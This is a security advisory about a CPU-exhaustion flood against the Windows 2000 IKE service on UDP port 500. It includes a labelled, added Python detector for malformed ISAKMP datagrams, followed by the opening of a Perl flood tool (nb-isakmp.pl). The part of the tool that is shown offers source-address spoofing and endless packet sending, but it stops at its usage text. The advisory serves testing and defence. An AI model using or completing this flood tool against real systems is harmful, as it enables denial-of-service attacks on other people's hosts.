As we reported in our previous article, UDP DoS Attack on Windows 2000 IKE, a security vulnerability in the Windows 2000 operating system allows remote attackers to consume a large amount of CPU time by flooding the IKE port (UDP port 500). The following exploit code can be used by administrators to test their systems for this vulnerability.
Credit:
The information has been provided by Nelson Brito.
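For the monitoring side of the flood described above, the following is an added example (not part of the original advisory or of the author's tool) that checks captured UDP/500 payloads against the fixed ISAKMP header from RFC 2408 and counts malformed datagrams per destination per second. It assumes the filler payloads produced by the tool's -r option do not form a valid IKEv1 header; the function names, the threshold of 100, and the sample packets are constructed for illustration.

```python
import struct
from collections import Counter

# RFC 2408 fixed header: cookies (8+8), next payload, version, exchange type,
# flags, message ID, total length = 28 bytes.
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")

def is_plausible_isakmp(payload: bytes) -> bool:
    """True if a UDP/500 payload carries a well-formed IKEv1 (ISAKMP) header."""
    if len(payload) < ISAKMP_HDR.size:
        return False
    icookie, _rc, _np, version, _xchg, _flags, _mid, length = \
        ISAKMP_HDR.unpack_from(payload)
    return (icookie != b"\x00" * 8       # initiator cookie must be non-zero
            and version >> 4 == 1        # major version 1 (IKEv1)
            and length == len(payload))  # length field covers the whole message

def flag_floods(packets, threshold=100):
    """packets: iterable of (epoch_seconds, dst_ip, dst_port, payload).

    Returns {(dst_ip, second): count} for each second in which malformed
    UDP/500 datagrams to one destination reach `threshold` (assumed value).
    Counts are keyed by destination only, because the source address of a
    spoofed flood is attacker-controlled and useless as a grouping key.
    """
    malformed = Counter()
    for ts, dst, dport, payload in packets:
        if dport == 500 and not is_plausible_isakmp(payload):
            malformed[(dst, int(ts))] += 1
    return {key: n for key, n in malformed.items() if n >= threshold}

def sample_capture():
    """Constructed sample: one valid header, 150 filler datagrams, one DNS packet."""
    good = ISAKMP_HDR.pack(b"\x11" * 8, b"\x00" * 8, 0, 0x10, 2, 0, 0, 28)
    pkts = [(1000.2, "192.0.2.10", 500, good)]
    pkts += [(1001 + i / 1000, "192.0.2.10", 500, b"." * 64) for i in range(150)]
    pkts.append((1001.5, "192.0.2.10", 53, b"." * 64))  # other port, ignored
    return pkts

if __name__ == "__main__":
    for (dst, sec), n in flag_floods(sample_capture()).items():
        print(f"{dst} second={sec}: {n} malformed UDP/500 datagrams")
```

The same header check can serve as a pre-filter in front of an IKE daemon, so that datagrams failing it are dropped before any negotiation state is allocated.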
Exploit:
#!/usr/bin/perl -w
####################################################################
# Author : Nelson Brito
# E-mail : nelson@SEKURE.ORG
# File : nb-isakmp.pl
# Version : 0.3 Alpha
# Country : Brazil
# Date : 12/10/2001
####################################################################
use Socket;
use Net::RawIP;
use Getopt::Std;
($o{'s'}&&$o{'d'})||die
"\nUse: $0 [IP Options] [UDP Options]\n\n",
"IP Options:\n",
"\t\t-s*\tsource address to spoof\n",
"\t\t-d*\tdestination address to attack\n",
"\t\t-v\tIP Version\t\t\t\t(def: $v)\n",
"\t\t-t\tIP Type of Service (TOS)\t\t(def: $t)\n",
"\t\t-f\tIP fragementation offset\t\t(def: $f)\n",
"\t\t-T\tIP Time to Live (TTL)\t\t\t(def: $T)\n",
"UDP Options:\n",
"\t\t-p\tdestination port to attack\t\t(def: $p)\n",
"\t\t-l\tpacket length to send\t\t\t(def: $l)\n",
"\t\t-r\tset randon data\t\t\t\t(def: \".\")\n",
"Generic:\n",
"\t\t-n\tnumber of packets to send\t\t(def: $n)\n",
"\t\t-L\tsend packets forever\n\n",
"Copyright © 2000 Nelson Brito <nelson\@SEKURE.ORG>.\n";